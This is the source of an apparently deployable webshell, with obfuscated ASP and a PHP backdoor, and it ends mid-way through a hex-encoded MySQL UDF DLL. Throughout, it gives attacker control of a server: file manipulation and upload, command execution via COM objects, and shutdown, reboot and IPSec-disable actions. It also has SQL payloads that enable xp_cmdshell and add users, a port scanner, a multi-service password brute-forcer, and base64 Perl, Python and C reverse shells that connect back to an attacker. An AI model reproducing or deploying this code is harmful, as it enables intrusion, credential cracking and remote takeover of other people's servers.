    " +iquhg "Groups",False +ltvq"100%" +For Each fnc In eduj +tygwb +eedi""&fnc.Name&"" +igl +jozsz=0 +For Each subProp In fnc.Properties_ +abywz jozsz +doTd subProp.Name,"" +doTd subProp.Value,"" +igl +uuuk +Next +Next +xlvqe +echo"" +smeb(Err) +End Sub +Sub qxbon() +Dim yzka,plz,fmsm +fpx("DataSource List") +If Not qjr Then On Error Resume Next +Set bnes=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\default:StdRegP"&bqlnw&"rov") +jpklj=&H80000002 +fmsm="SOFTW"&cyz&"ARE\ODBC\ODBCINST.INI" +bnes.EnumKey jpklj,fmsm,yzka +ltvq"100%" +tygwb +doTd"DataBase Driver","" +doTd"Driver Path","" +igl +jozsz=0 +For Each strOdbcName In yzka +abywz jozsz +doTd strOdbcName,"" +bnes.GetStringValue jpklj,fmsm&"\"&strOdbcName,"Driver",plz +doTd plz,"" +igl +uuuk +Next +xlvqe +End Sub +Sub ehyx() +Dim sefc,dkb,rrf,umj +If Not qjr Then On Error Resume Next +Set zsckm=dtwz("wi"&kcb&"nmgmts:\\.\ro"&todxo&"ot\ci"&dmly&"mv2") +Set dkb=zsckm.InstancesOf("Win32_OperatingSy"&mvwu&"stem") +fpx("xcngn Tools") +echo"
    " +ltvq"60%" +ztlif False +xze"acxze","dlagb" +abywz 1 +doTd "Turn off server","80%" +ncxl "Do it","20%" +igl +zro +ztlif False +xze"acxze","reset" +abywz 0 +doTd"Reset server","" +ncxl "Do it","" +igl +zro +ztlif False +xze"acxze","xcnu" +abywz 1 +doTd "Disable TCP/IP filter","" +ncxl "Do it","" +igl +zro +xlvqe +echo"
    " +Select Case acxze +Case "dlagb" +For Each sefc In dkb +If sefc.Shutdown()=0 Then +zhv"Shuting computer,fuck off!" +Else +zhv"Shut computer fail-_-!" +End If +Next +Case "reset" +For Each sefc In dkb +If sefc.Reboot()=0 Then +zhv"Restarting computer,connect later..." +Else +zhv"Restart computer fail-_-!" +End If +Next +Case "xcnu" +Set rrf=zsckm.ExecQuery("select * from Win32_NetworkAda"&dkp&"pterConfiguration where IPEnabled ='True'") +For Each umj In rrf +dised=umj.DisableIPSec() +If dised=0 Or dised=1 Then +zhv"IP filter disable succeed!You need to restart server to make it effective." +Else +zhv"IP filter disable fail-_-!" +End If +Next +End Select +End Sub +Sub fpx(ivv) +%> + + +<%=xacj%> + + + + + + + + + + + + + + + + + + + +

    <%=gbba("LOCAL_ADDR")&"("&xnqtl&")"%>

    +<%adutj xacj,"#0099FF","3"%>
    +
    <%=jck()%>

    +<% +echo"" +adutj ivv&" »","#0099ff","2" +eedi"

    " +End Sub +Function tortz(vqsbz) +Set objCountFile=dut.OpenTextFile(vqsbz,1,True) +tortz=objCountFile.ReadAll +objCountFile.Close +Set objCountFile=Nothing +End Function +Function zhxc(vqsbz) +Dim kodwq +If Not qjr Then On Error Resume Next +Set kodwq=mfmq("Adodb.Stream") +With kodwq +.Type=2 +.Mode=3 +.Open +.LoadFromFile vqsbz +.Charset="utf-8" +.Position=2 +zhxc=.ReadText() +.Close +End With +Set kodwq=Nothing +End Function +Sub vtyjq(vqsbz,spmh) +Dim theFile +Set theFile=dut.OpenTextFile(vqsbz,2,True) +theFile.Write spmh +theFile.Close +Set theFile=Nothing +End Sub +Sub oooeu(vqsbz,spmh) +Dim kodwq +If Not qjr Then On Error Resume Next +Set kodwq=mfmq("Adodb.Stream") +With kodwq +.Type=2 +.Mode=3 +.Open +.Charset="utf-8" +.WriteText spmh +.SavetoFile vqsbz,2 +.Close +End With +Set kodwq=Nothing +End Sub +Sub vwsrt() +If Not qjr Then On Error Resume Next +If mhve="file"Then +vqsbz=vqsbz&"\"&yug +Call dut.CreateTextFile(vqsbz,False) +wqj +Else +dut.CreateFolder(vqsbz&"\"&yug) +End If +If Err Then +smeb(Err) +Else +zhv"File/folder created" +End If +End Sub +Sub mgxnb() +Dim etzij,advu,ooz,mxq +If Not qjr Then On Error Resume Next +vqsbz=lgk(puvgw,"|",False) +etzij=smfap(puvgw,"|") +If InStr(vqsbz,"\")<1 Then vqsbz=vqsbz&"\" +Dim theFile,fileName,aqwr +If vqsbz=""Or etzij=""Then +zhv"Parameter wrong!" +Exit Sub +End If +If strFileMethod="fso"Then +If acxze="renamefolder"Then +Set aqwr=dut.GetFolder(vqsbz) +aqwr.Name=etzij +Set aqwr=Nothing +Else +Set theFile=dut.GetFile(vqsbz) +theFile.Name=etzij +Set theFile=Nothing +End If +Else +mxq=smfap(vqsbz,"\") +ooz=lgk(vqsbz,"\",False) +Set advu=erd.NameSpace(ooz) +Set objItem=advu.ParseName(mxq) +objItem.Name=etzij +End If +If Err Then +smeb(Err) +Else +zhv"Rename completed" +End If +End Sub +Sub vuh() +If Not qjr Then On Error Resume Next +If acxze="sgqly"Then +Call dut.DeleteFolder(vqsbz,True) +Else +Call dut.DeleteFile(vqsbz,True) +End If +If Len(vqsbz)=2 Then vqsbz=vqsbz&"\" +If Err Then +smeb(Err) +Else +zhv"File/folder deleted" +End If +End Sub +Sub jreg() +Dim ylkbe,zyn,bpavi,egcb,kcos +If Not qjr Then On Error Resume Next +vqsbz=Left(puvgw,Instr(puvgw,"|")-1) +zyn=Mid(puvgw,InStr(puvgw,"|")+1) +If vqsbz=""Or zyn=""Then +zhv"Parameter wrong!" +Exit Sub +End If +If Right(zyn,1)<>"\"Then zyn=zyn&"\" +Select Case acxze +Case"vihy" +Call dut.CopyFolder(vqsbz,zyn) +Case"tbqwf" +Call dut.CopyFile(vqsbz,zyn) +Case"ewvk" +Call dut.MoveFolder(vqsbz,zyn) +Case"ejgn" +Call dut.MoveFile(vqsbz,zyn) +End Select +If Err Then +smeb(Err) +Else +zhv"File/folder copyed/moved" +End If +End Sub +Sub rsri() +Dim sdxpm,argbp,wruwd,clagp +If Not qjr Then On Error Resume Next +vqsbz=Left(puvgw,Instr(puvgw,"|")-1) +If Right(vqsbz,1)="\"And Len(vqsbz)>3 Then vqsbz=Left(vqsbz,Len(vqsbz)-1) +argbp=smfap(vqsbz,"\") +wruwd=Mid(puvgw,Instr(puvgw,"|")+1) +vqsbz=lgk(vqsbz,"\",False) +Set clagp=erd.NameSpace(vqsbz) +Set sdxpm=clagp.ParseName(argbp) +If wruwd<>""Then +If IsDate(wruwd) Then sdxpm.ModifyDate=wruwd +End If +If Err Then +smeb(Err) +Else +zhv"Time modiffied" +End If +Set sdxpm=Nothing +Set clagp=Nothing +End Sub +Sub qws() +Response.Clear +If Not qjr Then On Error Resume Next +Dim kodwq,fileName,kpmtb +fileName=smfap(vqsbz,"\") +Set kodwq=mfmq("Adodb.Stream") +kodwq.Open +kodwq.Type=1 +kodwq.LoadFromFile(vqsbz) +smeb(Err) +session.CodePage=936 +Response.AddHeader"Content-Disposition","Attachment; Filename="&fileName +session.CodePage=65001 +Response.AddHeader"Content-Length",kodwq.Size +Response.ContentType="Application/Octet-Stream" +Response.BinaryWrite kodwq.Read +Response.Flush() +kodwq.Close +Set kodwq=Nothing +End Sub +Sub uvrs() +If Not qjr Then On Error Resume Next +Dim i,j,info,srh,theFile,fileName,spmh +If InstrRev(vqsbz,".")"\"Then vqsbz=vqsbz&"\" +vqsbz=vqsbz&igiqh +End If +If InStr(vqsbz,":")<1 Then vqsbz=vqt&"\"&vqsbz +Set kodwq=mfmq("Adodb.Stream") +Set srh=mfmq("Adodb.Stream") +With kodwq +.Type=1 +.Mode=3 +.Open +.Write Request.BinaryRead(Request.TotalBytes) +.Position=0 +spmh=.Read() +i=InStrB(spmh,chrB(13)&chrB(10)) +info=LeftB(spmh,i-1) +i=Len(info)+2 +i=InStrB(i,spmh,chrB(13)&chrB(10)&chrB(13)&chrB(10))+4-1 +j=InStrB(i,spmh,info)-1 +srh.Type=1 +srh.Mode=3 +srh.Open +kodwq.position=i +.CopyTo srh,j-i-2 +If xxyj=1 Then +srh.SavetoFile vqsbz,2 +Else +srh.SavetoFile vqsbz +End If +If Err Then +smeb(Err) +Else +zhv"File uploaded" +End If +srh.Close +.Close +End With +Set kodwq=Nothing +Set srh=Nothing +End Sub +Function rsdx(xdl) +If Not zvhy Or xdl=""Then +rsdx=xdl +Exit Function +End If +Dim tt,odyzj +tt="" +For i=1 To Len(xdl) +odyzj=Mid(xdl,i,1) +If Asc(odyzj)<128 And Asc(odyzj)>0 then +tt=tt&Asc(odyzj)+ybd&miih +Else +tt=tt&odyzj&miih +End If +Next +rsdx=Left(tt,Len(tt)-1) +End Function +Function wdhw(jtd) +If Not zvhy Or jtd=""Then +wdhw=jtd +Exit Function +End If +Dim dd,ofetm +dd="" +ofetm=Split(jtd,miih) +For i=0 To UBound(ofetm) +If IsNumeric(ofetm(i))Then +dd=dd&Chr(CInt(ofetm(i))-ybd) +Else +dd=dd&ofetm(i) +End If +Next +wdhw=dd +End Function +Function jck() +Dim bdyaf,pylll,vhjdi +pylll=88 +vhjdi=31 +bdyaf="
    " +bdyaf=bdyaf&"Bink Team | " +bdyaf=bdyaf&"0kee Team | " +bdyaf=bdyaf&"T00ls | " +bdyaf=bdyaf&"Fuck Tencent" +jck=bdyaf +End Function +Function gbba(str) +gbba=Request.ServerVariables(str) +End Function +Function mfmq(frije) +Set mfmq=Server.CreateObject(frije) +End Function +Function dtwz(frije) +Set dtwz=GetObject(frije) +End Function +Function qtyi(str) +qtyi=server.urlencode(str) +End Function +Function pjaq(str) +Dim yyz,ewfcm +yyz="" +For i=0 To Len(str)-1 +ewfcm=Right(str,Len(str)-i) +If Asc(ewfcm)<16 Then yyz=yyz&"0" +yyz=yyz&CStr(Hex(Asc(ewfcm))) +Next +pjaq="0x"&yyz +End Function +Function pxxk(str) +Dim yyz,ewfcm +yyz="" +For i=0 To Len(str)-1 +ewfcm=Right(str,Len(str)-i) +yyz=yyz&CStr(Hex(Asc(ewfcm)))&"00" +Next +pxxk="0x"&yyz +End Function +Function htmlEncode(str) +str=vresz(str) +str=Replace(str,Chr(13)&Chr(10),"
    ") +htmlEncode=Replace(str," "," ") +End Function +Function vresz(str) +If str=""Or IsNull(str)Then +vresz="" +Exit Function +End If +vresz=Server.HtmlEncode(str) +End Function +Function dhh(str) +dhh=Server.MapPath(str) +End Function +Sub smeb(Err) +If Err Then +zhv"Exception :"&Err.Description +zhv"Exception source :"&Err.Source +Err.Clear +End If +End Sub +Function utzvg(ByVal str) +str=Replace(str,"\","\\") +utzvg=Replace(str,"\\\\","\\") +End Function +Function lgk(str,pnux,qxqyo) +If str="" Or InStr(str,pnux)<1 Then +lgk="" +Exit Function +End If +If qxqyo Then +lgk=Left(str,InStr(str,pnux)-1) +Else +lgk=Left(str,InstrRev(str,pnux)-1) +End If +End Function +Function smfap(str,pnux) +If str="" Or InStr(str,pnux)<1 Then +smfap="" +Exit Function +End If +smfap=Mid(str,InstrRev(str,pnux)+Len(pnux)) +End Function +Sub echo(str) +Response.Write str +End Sub +Sub eedi(str) +echo str&vbCrLf +End Sub +Sub iquhg(frije,opns) +echo""&frije&" :" +echo"
    +
    +

    +END; + $shell = new COM($com[$object]); +if($object == 'wscript') +{ + $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; + $cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe'; +print<<
    +command: +
    +END; + if(!empty($_POST['cmd'])) + { + + $exe = @$shell->exec("$cmdpath /c ".$cmd); + $out = $exe->StdOut(); + $output = $out->ReadAll(); + echo '
    '.$output.'
    '; + } +} +elseif($object == 'application') +{ + $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; + $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\windows\php.ini c:\php.ini'; +print<< +

    Command argv:
    +


    +END; + if(!empty($_POST['run'])) echo (@$shell->ShellExecute($run,'/c '.$cmd) == '0') ? 'Done' : 'Faild'; +} +elseif($object == 'adodb') +{ + $string = isset($_POST['string']) ? $_POST['string'] : ''; + $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; +print<< +function hFull(i){ + if(i==0 || i==10) return false; + Str = new Array(12); + Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb;Jet OLEDB:Database Password=***"; + Str[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa"; + Str[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root"; + Str[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;"; + Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass"; + Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;"; + Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword"; + Str[8] = "DSN=mydns;Uid=username;Pwd=password"; + Str[9] = "FILEDNS=c:\\\path\\\db.dsn;Uid=username;Pwd=password"; + Str[11] = "SELECT * FROM [TableName] WHERE ID<100"; + Str[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')"; + Str[13] = "UPDATE [TableName] SET USER='b4che10r' WHERE ID=100"; + Str[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; + Str[15] = "DROP TABLE [TableName]"; + Str[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; + Str[17] = "select shell('c:\windows\system32\cmd.exe /c net user b4che10r abc123 /add');"; + Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; + Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; + Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; + Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')"; + Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')"; + Str[23] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '' > c:\info.php';"; + Str[24] = "sp_makewebtask @outputfile='d:\\\web\\\test.php',@charset=gb2312,@query='select test';"; + Str[25] = "Exec master.dbo.xp_cmdshell 'ver';"; + Str[26] = "Select Name FROM Master..SysDatabases;"; + Str[27] = "select name from sysobjects where type='U';"; + Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');"; + Str[29] = "select username,password from dba_users;"; + Str[30] = "select TABLE_NAME from all_tables;"; + Str[31] = "desc admin;"; + Str[32] = "grant connect,resource,dba to user_name;"; + Str[33] = "select datname from pg_database;"; + Str[34] = "select relname from pg_stat_user_tables;"; + Str[35] = "\\\d table_name"; + Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));"; + Str[37] = "\\\! uname -a"; + Str[38] = "select schemaname from syscat.schemata;"; + Str[39] = "select name from sysibm.systables;"; + Str[40] = "select colname from syscat.columns where tabname='table_name';"; + Str[41] = "db2 get db cfg for db_name;"; + Str[42] = "select name from sysdatabases;"; + Str[43] = "select tabname from systables where tabid=n;"; + Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;"; + Str[45] = "select username,usertype,password from sysusers;"; + if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} + return true; +} + +conn strings:
    + +

    SQL Commnad:
    + +
    +END; + if(!empty($string)) + { + @$shell->Open($string); + $result = @$shell->Execute($sql); + $count = $result->Fields->Count(); + for($i=0;$i < $count;$i++){$Field[$i] = $result->Fields($i);} + echo $result ? $sql.' Done
    ' : $sql.' Faild
    '; + if(!empty($count)){while(!$result->EOF){for($i=0;$i < $count;$i++){echo $Field[$i]->value.'
    ';}@$result->MoveNext();}} + $shell->Close(); + } +} + $shell = NULL; + echo '
    '; + return true; +} + +//scan port + +function Port_i() +{ +print<< +
    +Scan IP
    +

    Ports
    +

    +

    +END; + if((!empty($_POST['ip'])) && (!empty($_POST['port']))) + { + $ports = explode('|',$_POST['port']); + for($i = 0;$i < count($ports);$i++) + { + $fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,1); + echo $fp ? 'Openned Ports ---> '.$ports[$i].'
    ' : 'Closed Ports ---> '.$ports[$i].'
    '; + ob_flush(); + flush(); + } + } + echo ''; + return true; +} + +//convert shellcode + +function shellcode_decode($Url_String,$Oday_value) +{ + $Oday_value = hexdec($Oday_value); + $$Url_String = str_replace(" ", "", $Url_String); + $SHELL = explode("%u", $Url_String); + for($i=0;$i < count($SHELL);$i++) + { + $Temp = $SHELL[$i]; + $s_1 = substr($Temp,2); + $s_2 = substr($Temp,0,2); + $COPY .= $s_1.$s_2; + } + for($n=0; $n < strlen($COPY); $n+=2){$Decode .= pack("C", hexdec(substr($COPY, $n, 2) )^ $Oday_value);} + return $Decode; +} + +function shellcode_encode($Url_String,$Oday_value) +{ + $Length =strlen($Url_String); + $Todec = hexdec($Oday_value); + for ($i=0; $i < $Length; $i++) + { + $Temp = ord($Url_String[$i]); + $Hex_Temp = dechex($Temp ^ $Todec); + if (hexdec($Hex_Temp) < 16) $Hex_Temp = '0'.$Hex_Temp; + $hex .= $Hex_Temp; + } + if ($Length%2) $hex .= $Oday_value.$Oday_value; else $hex .= $Oday_value.$Oday_value.$Oday_value.$Oday_value; + for ($n=0; $n < strlen($hex); $n+=4) + { + $Temp = substr($hex, $n, 4); + $s_1= substr($Temp,2); + $s_2= substr($Temp,0,2); + $Encode.= '%u'.$s_1.$s_2; + } + return $Encode; +} + +function shellcode_findxor($Url_String) +{ + for ($i = 0; $i < 256; $i++) + { + $shellcode[0] = shellcode_decode($Url_String, dechex($i)); + if ((strpos ($shellcode[0],'tp:')) || (strpos ($shellcode[0],'url')) || (strpos ($shellcode[0],'exe'))) + { + $shellcode[1] = dechex($i); + return $shellcode; + } + } +} + +function Shellcode_j() +{ + $Oday_value = '0'; + $Shell_Code = 'http://blog.taskkill.net/mm.exe'; + $checkeda = ' checked'; + $checkedb = ''; + if(!empty($_POST['code'])) + { + if($_POST['xor'] == 'a' && isset($_POST['number'])){$Oday_value = $_POST['number'];$Shell_Code = shellcode_encode($_POST['code'],$Oday_value);} + if($_POST['xor'] == 'b'){$checkeda = '';$checkedb = ' checked';$Shell_Code_Array = shellcode_findxor($_POST['code']);$Shell_Code = $Shell_Code_Array[0];$Oday_value = $Shell_Code_Array[1];} + if(!$Oday_value) $Oday_value = '0'; + if(!$Shell_Code) $Shell_Code = 'could not find the shellcode download url'; + $Shell_Code = htmlspecialchars($Shell_Code); + } +print<< +
    XOR Value:    +encode shellcode with XOR decode shellcode with XOR
    +
    +
    + +END; + return true; +} + +//weak scan + +function Crack_k() +{ + $MSG_BOX = 'waiting for message queue......'; + $ROOT_DIR = File_Mode(); + $SORTS = explode('/',$ROOT_DIR); + array_shift($SORTS); + $PASS = join(',',$SORTS); + for($i = 0;$i < 10;$i++){$n = (string)$i; $PASS .= $n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.$n.',';} + if((!empty($_POST['address'])) && (!empty($_POST['user'])) && (!empty($_POST['pass']))) + { + $SORTPASS = explode(',',$_POST['pass']); + $connect = false; + $MSG_BOX = 'not found'; + for($k = 0;$k < count($SORTPASS);$k++) + { + if($_POST['class'] == 'mysql') $connect = @mysql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k])); + if($_POST['class'] == 'ftp'){$Ftp_conn = @ftp_connect($_POST['address'],'21');$connect = @ftp_login($Ftp_conn,$_POST['user'],chop($SORTPASS[$k]));} + if($_POST['class'] == 'mssql') $connect = @mssql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k])); + // if($_POST['class'] == 'pgsql') $connect = @pg_connect("host=$_POST['address'] port=5432 dbname=postgres user=$_POST['user'] password=".chop($SORTPASS[$k])); + if($_POST['class'] == 'pgsql') $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop($SORTPASS[$k])}"); + //$connect = @oci_connect('system','oracle','"//localhost/orcl'); + if($_POST['class'] == 'oracle') $connect = @oci_connect($_POST['user'],chop($SORTPASS[$k]),$_POST['address']); + if($_POST['class'] == 'ssh'){$ssh_conn = @ssh2_connect($_POST['address'],'22');$connect = @ssh2_auth_password($ssh_conn,$_POST['user'],chop($SORTPASS[$k]));} + if($connect) $MSG_BOX = '[project: '.$_POST['class'].'] [ip: '.$_POST['address'].'] [user: '.$_POST['user'].'] [pass: '.$SORTPASS[$k].']'; + } + } +print<< +
    {$MSG_BOX}
    +
    Host
    +
    User
    +
    Pass
    +
    Crack Project: Mysql +FTPmssqlPgsqlOracleSSH
    +
    +END; + return true; +} + +//back connect + +function Linux_l() +{ + echo '

    '; +print<<
    +Your IP: +Your Port: +Script Used: +

    +END; + if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) + { + if($_POST['use'] == 'perl') + { + $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + echo File_Write('/tmp/b4che10r_pl',base64_decode($back_connect_pl),'wb') ? 'create /tmp/b4che10r_pl success
    ' : 'create /tmp/b4che10r_pl faild
    '; + $perlpath = Exec_Run('which perl'); + $perlpath = $perlpath ? chop($perlpath) : 'perl'; + echo Exec_Run($perlpath.' /tmp/b4che10r_pl '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'execute command faild' : 'execute command successfully'; + } + if($_POST['use'] == 'python') + { + $back_connect_py="IyAtKi0gY29kaW5nOnV0Zi04IC0qLQ0KIyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoiIiINCmJhY2sgY29ubmVjdCBweSB2ZXJzaW9uLG9ubHkgbGludXggaGF2ZS". + "BwdHkgbW9kdWxlDQoiIiINCmltcG9ydCBzeXMsb3Msc29ja2V0LHB0eQ0Kc2hlbGwgPSAiL2Jpbi9zaCINCmRlZiB1c2FnZShuYW1lKToNCiAgICBwcmludCAn". + "cHl0aG9uIGNvbm5lY3QgYmFja2Rvb3InDQogICAgcHJpbnQgJ3VzYWdlOiAlcyA8aXBfYWRkcj4gPHBvcnQ+JyAlIG5hbWUNCg0KZGVmIG1haW4oKToNCiAgIC". + "BpZiBsZW4oc3lzLmFyZ3YpICE9MzoNCiAgICAgICAgdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQogICAgICAgIHN5cy5leGl0KCkNCiAgICBzPXNvY2tldC5zb2NrZXQo". + "c29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KICAgIHRyeToNCiAgICAgICAgcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lzLmFyZ3ZbMl". + "0pKSkNCiAgICAgICAgcHJpbnQgJ2Nvbm5lY3Qgb2snDQogICAgZXhjZXB0Og0KICAgICAgICBwcmludCAnY29ubmVjdCBmYWlsZCcNCiAgICAgICAgc3lzLmV4". + "aXQoKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKQ0KICAgIG". + "dsb2JhbCBzaGVsbA0KICAgIG9zLnVuc2V0ZW52KCdISVNURklMRScpDQogICAgb3MudW5zZXRlbnYoJ0hJU1RGSUxFU0laRScpDQogICAgcHR5LnNwYXduKHNo". + "ZWxsKQ0KICAgIHMuY2xvc2UoKQ0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIG1haW4oKQ=="; + echo File_Write('/tmp/b4che10r_py',base64_decode($back_connect_py),'wb') ? 'create /tmp/b4che10r_py success
    ' : 'create /tmp/b4che10r_py faild
    '; + $pypath = Exec_Run('which python'); + $pypath = $pypath ? chop($pypath) : 'python'; + echo Exec_Run($pypath.' /tmp/b4che10r_py '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'execute command faild' : 'execute command successfully'; + } + + if($_POST['use'] == 'c') + { + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". + "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + echo File_Write('/tmp/b4che10r_bc.c',base64_decode($back_connect_c),'wb') ? 'create /tmp/b4che10r_bc.c success
    ' : 'create /tmp/b4che10r_bc.c faild
    '; + $res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/b4che10r_bc.c'); + echo Exec_Run('/tmp/b4che10r_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'execute command successfully' : 'execute command faild'; + } + echo '
    local machine need run (nc -vv -l -p '.$_POST['yourport'].')'; + } + echo ''; + return true; +} + +//mysql udf +function get_code() { + return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040